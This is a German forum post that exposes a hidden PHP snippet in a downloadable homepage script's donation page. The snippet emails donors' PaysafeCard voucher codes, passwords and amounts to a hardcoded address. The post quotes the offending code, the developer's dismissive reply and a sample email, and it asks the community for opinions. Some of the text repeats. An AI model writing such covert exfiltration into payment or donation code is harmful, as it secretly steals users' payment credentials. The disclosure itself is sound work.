Guten Abend liebe elitepvpers Community.
Heute habe ich eine wundersame Entdeckung gemacht. Ich habe mir die Homepage inkl. Script von Saad heruntergeladen ([Only registered and activated users can see links. Click Here To Register...]) Vom Design her gefällt sie mir bis auf kleine sachen aber das ist nicht um was es hier geht. Ich habe mir die spenden.php angeschaut und habe etwas entdeckt.
Zwischen Zeile 83 und 85:
(Wer die Clean HP haben möchte kann sie sich entweder oben im Thema runterladen oder falls Saad sie rausgenommen hat wie immer wenn jemand ihn nicht würdigt kann mich kontaktieren.)
Ich habe Saad drauf aufmerksam gemacht und seine Antwort war:
__
Meine Frage nun an die Community, was haltet ihr davon etc.
Ich finde es echt Arm von ihm, seine Antwort darauf war ja auch wohl
ein Witz.
Heute habe ich eine wundersame Entdeckung gemacht. Ich habe mir die Homepage inkl. Script von Saad heruntergeladen ([Only registered and activated users can see links. Click Here To Register...]) Vom Design her gefällt sie mir bis auf kleine sachen aber das ist nicht um was es hier geht. Ich habe mir die spenden.php angeschaut und habe etwas entdeckt.
Zwischen Zeile 83 und 85:
PHP Code:
$YOURMAIL = "[Only registered and activated users can see links. Click Here To Register...]";
$SEND_MAIL = mail($YOURMAIL,"PSC-Code: ".$cardVoucher."","PSC-Code: ".$cardVoucher."\n Passwort: ".$cardPasswort."\n Guthaben: ".$cardBetrag."\n Von:".$_SESSION['user_id']);
if($SEND_MAIL)
Ich habe Saad drauf aufmerksam gemacht und seine Antwort war:
Die genaue Konversation findet ihr hier: [Only registered and activated users can see links. Click Here To Register...]Quote:
Ja, da müsst ihr nur die email ändern und ihr bekommt sie auf eure.
So sieht das dann in der e-mail aus:
Quote:
Saad spendet 1000 EUR
Spendentyp: PSC
Spendenbetrag: 1000
Code der Spende: 0445382387685210
Passwort:
Kommentar des Users:
__
Meine Frage nun an die Community, was haltet ihr davon etc.
Ich finde es echt Arm von ihm, seine Antwort darauf war ja auch wohl
ein Witz.